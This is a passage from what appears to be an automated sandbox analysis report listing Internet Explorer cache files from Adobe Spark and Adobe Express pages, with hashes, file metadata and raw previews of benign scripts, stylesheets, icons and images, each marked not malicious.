                                                                                                                                                                                                                                                        Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","pccloseButtonType":"Icon","pccontinueWithoutAcceptText":"Continue without Accepting","cctId":"7a5eb705-95ed-4cc4-a11d-0cc5760e93db","MainText":"Cookie Settings","MainInfoText":"<div class=\"pc-logo-button\" id=\"ot-pc-logo-button\" tabindex=\"-1\">\n <button aria-label=\"Don.t enable\" class=\"disable-all-btn\" tabindex=\"0\">\n Don.t enable\n </button>\n <button aria-label=\"Enable all\" class=\"enable-all-btn\" id=\"accept-recommended-btn-handler\" tabindex=\"0\">\n Enable all\n </button>\n <button aria-label=\"Confirm my choices\" class=\"save-and-close pc-save-and-close save-preference-btn-handler onetrust-close-btn-handler\" tabindex=\"0\">\n Confirm my choices\n </button>\n</div>\n<div class=\"ot-general\">\n <div class=\"ot-general-width\">\n <h3>\n General information\n </h3>\n <ul aria-label=\"General Information\">\n <li id
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\favicon[1].ico
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):4286
                                                                                                                                                                                                                                                        Entropy (8bit):2.2437058322637595
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:suZgizzxxEKfLOQQEsmcpG3xbWT//zvUUUUUUUUUUUUUUUUUUUUUUNl:HgizzxxEKzOQBbcpS5WT//zVl
                                                                                                                                                                                                                                                        MD5:79FBE30FC79A42EAA8A32DC344959E0E
                                                                                                                                                                                                                                                        SHA1:09AC6EE75F9686BAD2003926C5FA8DB80777E981
                                                                                                                                                                                                                                                        SHA-256:01F2FA23190A55B0B5F9DF0E0B66E23D136B7701BA3CC9A71FDAEDD409D92345
                                                                                                                                                                                                                                                        SHA-512:FFCED953A2A53C1370FECE0E366D7AC304ACFFAE6E44F571BD2EFED6E225149647F64704332160AFA8DCD6C946B3AAAA6A80C5BD6900612F56687DC35ED5EB24
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://page.adobespark-assets.com/runtime/1.22/images/favicon.ico
                                                                                                                                                                                                                                                        Preview: ...... .... .........(... ...@..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................70..7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...70..............................7`..7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7`......................70..7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...70..................7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...................7...7...7...7...7...7...7...7...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\headIE.fp-f9e44dbeef5252f4d02c4ed9c4b6a618[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with LF, NEL line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):71836
                                                                                                                                                                                                                                                        Entropy (8bit):5.2834062351912525
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:akRyhGekI/d65mve+R6ohN3KjAXCxnRGO7AevGBVGcgTSnTK3o9ufC:akRyhGek7E3KEXChwOsKTSOg
                                                                                                                                                                                                                                                        MD5:F9E44DBEEF5252F4D02C4ED9C4B6A618
                                                                                                                                                                                                                                                        SHA1:6EFF709B896F31AE0F73C4F493DC081D51771F20
                                                                                                                                                                                                                                                        SHA-256:673875DD89E08974EAA386C2D7DF3F510C9D012E0DF65138347DD739F154EB1B
                                                                                                                                                                                                                                                        SHA-512:9558927F687C05A1AF27F8E42A5592CF820A06AE6F26EC8A3F3E4BB9689FE4964A7DA6CEB23ADF99871167150E5CA3B191DC1CA6301BCF8085909EBB9E986317
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/etc.hawks.dexterlibs/dexter/clientlibs/base/headIE.fp-f9e44dbeef5252f4d02c4ed9c4b6a618.js
                                                                                                                                                                                                                                                        Preview: // Nodelist ForEach polyfill from.// https://developer.mozilla.org/en-US/docs/Web/API/NodeList/forEach..window.NodeList&&!NodeList.prototype.forEach&&(NodeList.prototype.forEach=function(o,t){t=t||window;for(var i=0;i<this.length;i++)o.call(t,this[i],i,this)});..!function(t){var n={};function r(e){if(n[e])return n[e].exports;var o=n[e]={i:e,l:!1,exports:{}};return t[e].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=t,r.c=n,r.d=function(t,n,e){r.o(t,n)||Object.defineProperty(t,n,{configurable:!1,enumerable:!0,get:e})},r.n=function(t){var n=t&&t.__esModule?function(){return t.default}:function(){return t};return r.d(n,"a",n),n},r.o=function(t,n){return Object.prototype.hasOwnProperty.call(t,n)},r.p="",r(r.s=619)}([,,function(t,n,r){var e=r(13),o=r(9),i=r(38),u=r(36),c=r(58),a=function(t,n,r){var s,f,l,h,p=t&a.F,v=t&a.G,d=t&a.S,y=t&a.P,g=t&a.B,m=v?e:d?e[n]||(e[n]={}):(e[n]||{}).prototype,b=v?o:o[n]||(o[n]={}),x=b.prototype||(b.prototype={});for(s in v&&(r=n),r)l=((f=!p&&m&&void 0!==m[
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\icon-footer-twitter[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):764
                                                                                                                                                                                                                                                        Entropy (8bit):4.2898721619383515
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:tvveD/lIhNZHvr3t8bYDnNAxLgeZLU9YtxYMPWzG4BsVrvl5JiqC8n:tXeD/epp8QnNCLgQbbJMG4er1iqC8n
                                                                                                                                                                                                                                                        MD5:41324C2374C498667DF60F5DB9ED29BC
                                                                                                                                                                                                                                                        SHA1:E1D68AD0BCB242CC76D34A7D71C78ACFF9F25EFC
                                                                                                                                                                                                                                                        SHA-256:1C48D8EDF7F69BC479F00DD25EB2399DD2BF6F0AA3BF128089B0A7A1D8958D5E
                                                                                                                                                                                                                                                        SHA-512:851F947CEC590D196CFA1FD2390D4D380FB0E4F008B0813CC0A15CD1CBFEAF94883ECE65EEBEFA5C98B91E7F77EED99F213D601C49FA972B403DE9181414A955
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/icon-footer-twitter.svg
                                                                                                                                                                                                                                                        Preview: <svg id="Layer_1" xmlns="http://www.w3.org/2000/svg" width="67" height="67" viewBox="0 0 67 67"><style>.st0{fill:#717f8a}</style><path class="st0" d="M38.2 22.3c-2.6 1-4.3 3.4-4.1 6.1l.1 1-1-.1c-3.8-.5-7.1-2.1-10-4.9L21.7 23l-.4 1c-.8 2.3-.3 4.7 1.3 6.3.8.9.6 1-.8.5-.5-.2-.9-.3-1-.2-.1.1.4 2.1.8 2.8.5 1.1 1.7 2.1 2.9 2.7l1 .5h-1.2c-1.2 0-1.2 0-1.1.5.4 1.4 2.1 2.8 3.9 3.5l1.3.4-1.1.7c-1.7 1-3.6 1.5-5.6 1.6-.9 0-1.7.1-1.7.2 0 .2 2.6 1.4 4 1.9 4.5 1.4 9.8.8 13.7-1.6 2.8-1.7 5.7-5 7-8.2.7-1.7 1.4-4.9 1.4-6.4 0-1 .1-1.1 1.2-2.3.7-.7 1.3-1.4 1.5-1.6.2-.4.2-.4-.9 0-1.8.6-2 .6-1.2-.4.6-.7 1.4-1.9 1.4-2.3 0-.1-.3 0-.7.2-.4.2-1.2.5-1.8.7l-1.1.4-1-.7c-.6-.4-1.4-.8-1.8-.9-.9-.4-2.6-.4-3.5 0zM34 64C17.4 64 4 50.6 4 34S17.4 4 34 4s30 13.4 30 30-13.4 30-30 30z"/></svg>
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\launch-EN919758db9a654a17bac7d184b99c4820.min[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:C source, ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):568350
                                                                                                                                                                                                                                                        Entropy (8bit):5.3476031063655105
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:wXg4leApyL1n/CWuDmQX6nFu5zEr77Od/XsT4YTappFr1+Meeo89:EgIpo/CWuDZYu5zEr77OdM4Y44k
                                                                                                                                                                                                                                                        MD5:29B0DCC1B3CE7A8D33943ED3C1E737CA
                                                                                                                                                                                                                                                        SHA1:A76F1F2682837FF5F8CC1D96377C17964D19488E
                                                                                                                                                                                                                                                        SHA-256:A0AE50E6CE6BB2E728756629507BD505142A305EA2D7CC761C0F8F8F9DE39E87
                                                                                                                                                                                                                                                        SHA-512:50EC4100B53A3D9456B945569D443ACAE3EBCB68A5F2B22ABF515DBA2E6EE1659E0FEE9A64D0749BC8E63E8BC8E1F53E3A039AE9D14EF18CE4934D60BB8150C0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://assets.adobedtm.com/launch-EN919758db9a654a17bac7d184b99c4820.min.js
                                                                                                                                                                                                                                                        Preview: // For license information, see `https://assets.adobedtm.com/launch-EN919758db9a654a17bac7d184b99c4820.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2021-06-09T18:29:08Z",environment:"production",turbineBuildDate:"2021-04-26T16:54:28Z",turbineVersion:"27.1.3"},dataElements:{"digitalData.search.filters":{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return function(e){if(_satellite.getVar("adobe_aec_pages")&&digitalData._get("digitalData.filterInfo")&&digitalData._get("digitalData.filterInfo.filterName")){digitalData.search={},digitalData.search.filter=[],digitalData._set("digitalData.search.searchInfo.sort",digitalData.filterInfo.sortType);for(var t=digitalData.filterInfo.filterName.split("|"),n=0;n<t.length;n++)for(var a=t[n].split(":"),i=a[0],r=a[1].split(","),o=0;o<r.length;o++){var s={filterInfo:{}};s.filterInfo.category=i,s.filterInfo.keyword=r[o],digitalData.search.fil
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\login[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):144
                                                                                                                                                                                                                                                        Entropy (8bit):4.604190783593319
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:QIk4Xvwg3e/QgY1ALD64XHUQZ6WVSy1ALD64XHUQZ4n:QI5oPX7Ll0AVwLl0tn
                                                                                                                                                                                                                                                        MD5:4DF893C096E968AB098632EB452A252C
                                                                                                                                                                                                                                                        SHA1:0ED4EC3D8D81E70B9D1A9E6E7883FD8E22377AEC
                                                                                                                                                                                                                                                        SHA-256:668862C1854D47A4B178217DEC164025A2A4B1F45CC1409B9D02762DA50878E7
                                                                                                                                                                                                                                                        SHA-512:E6C566F1DF10CA05D7837A9038BB0CD4607B657D5FFC4523256FE1DB1A532E27111BDCF28C230448BAD71B6CA26F37F4AB9AAAAB5318276FAD0A7CF64239B4D1
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <p>Moved Permanently. Redirecting to <a href="/sp/login?r=reader_page_bumper_createyourown">/sp/login?r=reader_page_bumper_createyourown</a></p>
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\login[2].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):39223
                                                                                                                                                                                                                                                        Entropy (8bit):5.393661588723484
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:2l1lHt/JNVFGJIeNI9ReC0bG5woJhEZCvjgDMiB+2ahy2DdLSpcFFaf:cFe0erbGYZCvjkM2ahy2DVpFaf
                                                                                                                                                                                                                                                        MD5:4988454B1A3554BEB92EC9770DF5B61D
                                                                                                                                                                                                                                                        SHA1:400023351BA1665AF1B4C25D06BA9991C537EB2E
                                                                                                                                                                                                                                                        SHA-256:FA3E5AD84C52163CB5C4AB41CE35A945CE9336300718A9C9983DE05088DFB801
                                                                                                                                                                                                                                                        SHA-512:CFB08356135F3D2CA7A94CEC6329EEFC5EBCCF1007A302D31595C2C035493C2234FF0201FD188BD7E211A65ECE3295A65B3A0E6673D62538206B5993EBE6D1AA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/sp/login?r=reader_page_bumper_createyourown
                                                                                                                                                                                                                                                        Preview: <!DOCTYPE html>.<html lang="en-US">.<head>. <script nomodule>document.location.href = '/unsupported';</script>. <title>Make Images, Videos and Web Stories for Free in Minutes | Adobe Spark</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <meta name="viewport" content="width=device-width,shrink-to-fit=no,user-scalable=no,initial-scale = 1.0,maximum-scale = 1.0">.<script type="text/javascript">.;window.NREUM||(NREUM={});NREUM.init={privacy:{cookies_enabled:true}};.window.NREUM||(NREUM={}),__nr_require=function(t,e,n){function r(n){if(!e[n]){var i=e[n]={exports:{}};t[n][0].call(i.exports,function(e){var i=t[n][1][e];return r(i||e)},i,i.exports)}return e[n].exports}if("function"==typeof __nr_require)return __nr_require;for(var i=0;i<n.length;i++)r(n[i]);return r}({1:[function(t,e,n){function r(t){try{c.console&&console.log(t)}catch(e){}}var i,o=t("ee"),a=t(22),c={};try{i=localStorage.getItem("__nr_flags").split(","),console&&"function"==typeof con
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\marvel-ui-faf07216[1].css
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1787
                                                                                                                                                                                                                                                        Entropy (8bit):4.813025886465329
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:/ewdsJs+PkYbe3wgKTPJLw2bAvAEUQs1ZC7q8hDNNKkZOENYTnQ5l1egaKQKUL:kCBYbe3apyUQWGDNNKwNYT41dajV
                                                                                                                                                                                                                                                        MD5:9B374CB80282B92896CA0F5BFAF07216
                                                                                                                                                                                                                                                        SHA1:B31941ED10E9E8F193F5DC53A82038176576B2A1
                                                                                                                                                                                                                                                        SHA-256:D80D62755CC96593980D61D32B743B30834D3DEF42E152168000841F143ED8A5
                                                                                                                                                                                                                                                        SHA-512:892A94C95403380DCF02759F5AEABEFC2B9FD99CFF6899F830B3C166B9DD78520C763EFBA6989DB207D872526A2568CC3273B85120F2E4D74997E27CCF90436D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/marvel-core/css/marvel-ui-faf07216.css
                                                                                                                                                                                                                                                        Preview: a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,button,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,input,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{box-sizing:border-box;margin:0;padding:0;border:0;font-size:100%;font:inherit;font-family:sans-serif;font-weight:300;text-rendering:optimizeLegibility;vertical-align:top}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1;font-size:13px}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}table{border-collapse:collapse;border-spacing:0}body,html{height:100%}body{background-color:#555;position:relative;-webkit-font-smoothing:antialiased;-moz-os
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_10135ec5cad0e192875b8c4d38367486cff2f8bc7[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8236
                                                                                                                                                                                                                                                        Entropy (8bit):7.970490076571066
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:kFbzU7Bh47GF4jNbzKKZQ5vludTxKsZJstyOGWv9fSlOz:kFX8b47G6jdKKZQ5+Dm9Dv9Sl0
                                                                                                                                                                                                                                                        MD5:4EA608D017AB425AA8F519692D4BA62A
                                                                                                                                                                                                                                                        SHA1:36F01AA33FE14613F71923E9FE5B8F67B071E26A
                                                                                                                                                                                                                                                        SHA-256:8647E45D46B91B110BB697FC3030BBDF26F86B1694654BCA025F41C0E80C107D
                                                                                                                                                                                                                                                        SHA-512:4752D91B09B1363B8DE20B09506E026C5C2BAEAF3F0D93C1502C54F0EC14015CE56BC88D6F9592502F85C68771D012BEF28606E9D1E139C772BD6FFD8496C7AB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_10135ec5cad0e192875b8c4d38367486cff2f8bc7.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF$ ..WEBPVP8 . ..p....*,...>u8.I$."!$s...in.Y...O...M..'o.....7.~..'.~...~Wy..........'.._......1.../.?..........+.;.}.{/..@_d...;..7....G......./..........'.G.....7...../......e~................|..>...s.{._.o..u......&..,M#.zu...%I..y~19.k....H.q...(n.DN...%..E.....u..[.)....<..z...\*.bpn.J*.X..qL#a.n....f...d.8.G....N..vc.]0.73#....M/..S.|7..7?#.J...8..-......I. ..1J.p.X.........>W....%....!.^9......$.L.,.#@b.v..Y...F.$5;.....^.h..Q..B.C.....kY/...'.t.....B.6..c.9.J.sK....jl.G'.X...'.I...o.ND.Ps..kH/....b.S.....z|..^s.l..rg.a!OL...q..`..(j...........6.o..tT.wv$os|y.?....x.M. ...........+..$>..nx.d...s..viY....g.D.0`..,)tC...m..t^...D.i.R..~.3.4..u.......!.q?~..F....d....^e.X3IN....o9.6..&.=.O..|..v!.C..s.6..A......;...i..k.;...@...{x.Qf.../Z..6Q.4..Y..;.A1V...Q..v...J.6..R.<.{.F.V..(t..U.J.*$..+.....E..6x.e..n.+G...YE...~c&....&.(~<.. ._q.g...s#.a....Q...u.jM..s.rxR.<..q.Swy....h8..'..V.QpV.G..N....2..8,Z.X.I..C...A...[..#G.:..N%.>..l=BH..~.G..L.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_101f95855e967721bf3a66e02d5c53da102e51674[1].jpeg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):2426
                                                                                                                                                                                                                                                        Entropy (8bit):7.911752375782477
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:HPiJJswAeBpYYzTXC9uWsHy0ITQEVy7+zXQrbgWVmL2F0gHbBMtL:viJJWeB2okubHX+QEVKaXQrbgdEb2
                                                                                                                                                                                                                                                        MD5:D429C48D851C6A5FD97402FE1ECF4792
                                                                                                                                                                                                                                                        SHA1:1247216ADE627ED5F346D0C09F707A11B902FBF9
                                                                                                                                                                                                                                                        SHA-256:2F6C56593996954A745B48834D9914C2D00BF0236C51BADACDD92C9869129402
                                                                                                                                                                                                                                                        SHA-512:5B90F888B95159B08607E7BFEF2CB762D4A8986D3DCF42603932B0EFDB99C66A06B5BA4DDD40B53BB633E2B8B97C81CD3572CDCEBE4A140EE4DFA17CA344EEE3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/create/media_101f95855e967721bf3a66e02d5c53da102e51674.jpeg?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFr...WEBPVP8 f....9...*....>u8.H..".#5.....M.-.......i.....V....y..G.~.~..g..O...>.....c.c.)........u....?.{......q...e.3.s....]..o...../j_...^Z.....:.?.y{.G..t0.K/.>Z}..I.q.j.V..z.=.(..*.2{.jQ[.U.)......2.^.......]..\..n0..G.......Ki4Y=...B!:\.....,\....\...g.q`n;.u..V;..d...b..iD.....D....p.Ht....Q*P.$...,5..(h(..o?.=n.R....i.!.U.`5.C$...Y!3....Gv..%.....;......:.W..g.I..<.(5..k.iU..`.j(.7.j\[.x.........0.....UZI....he.t.@jl..j..q.aL.m.8&......|*.a...lAW...+R.............mw...Q..~S....fcCW.....gF.no....Y.m.......W..S.v.....d...v.B.....y~VbTJ..Ai./~...Flp....KI".......j.8......8..`..<..).?....)\.;,....o.v.H.:.....M.s...KN.;l.e.0..Y,..1....<L$...#.......;.........1....?2Y$.n...0.......b<.\.i.{..C.|~:.e..L."8J9...q#.2*<.%U...?y.H.c.<.v.8...x.....+%.\.Vq.....Y,....=.!..d}.S.?....G..&.Q.g.......}..S..4.!...k..Y.D....?.n8.+.y...7._.[.<..V'0.(.B[.i[....b.3s..%.@u.........]....|5z.c|.F...'..M`x. E.]..I...%.c.."}.j.!.;.......}.;...N.O.r.D.R.k
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_1086fd2a59b94c30b4908a573dc0dee6577320e1f[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):11614
                                                                                                                                                                                                                                                        Entropy (8bit):7.983943945978168
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:t37dC+0sGUkKpVBKBQaErAKWSKU1QaGjd902Mp7cGODCigi4dJqtQGapT8RBk2tf:trEesKpb7MKWS/QaGj0dYbadEQzT8w2d
                                                                                                                                                                                                                                                        MD5:C03791504EEAD41C916479068F7180CB
                                                                                                                                                                                                                                                        SHA1:FA860BC1BB755161338EEE6AB9F0274657C8FE6D
                                                                                                                                                                                                                                                        SHA-256:67577C133F767FDEEB8C6E5ACDCA36FCC1D3FBB7BC53D21E9CCD937ED06D6B28
                                                                                                                                                                                                                                                        SHA-512:E27CA1829D5E78EA5A3ACFCA238C4348587E344ACA7BD36CA0D9067A4CE99B85685C9844AB3114344BC7223C76C9218498BEB27284C5F97B5588E5892D62D56D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1086fd2a59b94c30b4908a573dc0dee6577320e1f.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFV-..WEBPVP8 J-..P....*..k.>u6.H$."!%r.....in.q....7.>...m........4........^.z.._..R.....W.../.~......%.O.............n...-.....m.s...........u...'..._.k.......7..._...~.......O.?....g.M............h>......{..._........9.........?..........o.........p..J"...z.&~*..#.j.Y.;...B... .`.00l.iZ.!..9.......?`.dL.Q.:P..%i....a.......e.L..%,x.9&......_|d./..`.l.&Pl".|.........L....A.....;.(....#.^Q..g..z..[.!...V.u.zL...;.-..r.t.4..p.H...fDe...].(.o01].,e.x..5-.U.=).v.uC].%...CN\.:..`.[X...<..}._q.....>i...1.R..}8.....;.gI.7g$.B.Q32R..+.l#.B..p..X....,.....F..%c]..6.....pH.yf..'.C.G......g..-aNR.,o....I.U...~*.\...A..{u....C...qC)...]..zg.S......!.:..?...MU.(A.98F.I.tw........H...$e...\.bD(...n.....zszl.9m.{.,.1...&.....I...'.^..kD.z)..To...0..8H.b....5.z....Vy..NS.`,.a..W......-.gj..\M..~gv..qG.8..Y...b.*.`=....y_.Wdi)d.....>#..#..C....>..h.X.Z.......@:?9.*.7....\u=.1.h.z.....B4.n....>..~.._....;.u......*v.0.u........(Z+....9.$.3..Tn.7D:&..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_10937001f471d8f9b59f9756cae4bf971e62366a8[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):5844
                                                                                                                                                                                                                                                        Entropy (8bit):7.955843954295509
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:J1cRwGJqHFYaDnTiwTrvBn1p9CfV0b53xvKorR2bE6AWKQFFi3iW3TV:JMCFfnWwTp1S0l3kuIc6FtuV
                                                                                                                                                                                                                                                        MD5:44564749B02A8D1B77A36771A984EADA
                                                                                                                                                                                                                                                        SHA1:9D4CFBC4080450CEFCE1FBBDCBD6B86DC7055182
                                                                                                                                                                                                                                                        SHA-256:B5EABEADACCA5755C7238E42A0C1AC1719411BEF4A75E7E3EF059770810950B6
                                                                                                                                                                                                                                                        SHA-512:7F5E3E7D4306CE3CE9B09FF413F137CAC1A7F2764E9922D08D792B778BBC673A60EB696F14251306E09D0CA9827991983731847019CE124785B1B6CF57A308BB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_10937001f471d8f9b59f9756cae4bf971e62366a8.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 .....s...*,...>u8.I.."!".Y....in.rtJ[2g...W....C.oLwz?.NL..?...............g.FK...w.?x?A...n....G.......{.?.G.?F........A.9...;....._._.?x...%.W....?........e.O.......?....A.{.O.O.......m...'.{.{......t.....!....eU|L+_..d.....q..Zr.*[..!K.<P..j.:R...#..F.ORC...,...h....u...T.:...R%.H_>.3..^..oUs...hgn]Ft.Hu6d.0......<....E.Ra......~T...9...ap.0.(S3..Tu,O&H..^:...u..x.M..h..Ic.yg........G...R...P.:>.y..,!@.....1..D.C..K.$b3...x:.`....]..t..!k..7.Ls.,[W..b...GR....x.....sN......UN..,.....)..w6..Lw...l...ns...L......||.}.z..u...}./.+.>...'):....8.P.%a....|.P<..._......,....&k.E..*.R9..~..Gg...x...:F. ...[*.P.UX.l..B.Ub.....eU....-.V([*.P.UW..Dc.(..b4.....9...v.e/.....}...8..6+...2G..F....).V.Aq..U........R..qj._...M...t....^:...u....b+.X..V"....EKwI.xe.....B.~;.....C...v..l....c.....M .[L.l1.....L..U.%p....."..r.sdnV_...]|Wv..~s{...y.^....a..P.@.....6.....}...b..o.$.0.I.^`..._...............!.. DX.#..^ ..7l<.~...y.xp..b...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_119fa8433c6810e9daf1b00f4e515aadaf1026dc6[1].jpeg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):2946
                                                                                                                                                                                                                                                        Entropy (8bit):7.9324634777159595
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:k95OSY+erIceq51VN+bkFxwGQmXjgwsEuM+iKOpDdUQTMOv2ttGQj9+daZgfmYy:keSrerIceKXwa7PxDuM+iKOpDtTdO84P
                                                                                                                                                                                                                                                        MD5:EA850821A7886F5CF06FC88418B3D36C
                                                                                                                                                                                                                                                        SHA1:85F9E54C082C066FD376228A2A0E4F9C1B7EDC8D
                                                                                                                                                                                                                                                        SHA-256:11F2C079D12E42C4FD013839AD431A40F28D130088FF217328B70412A89AA57C
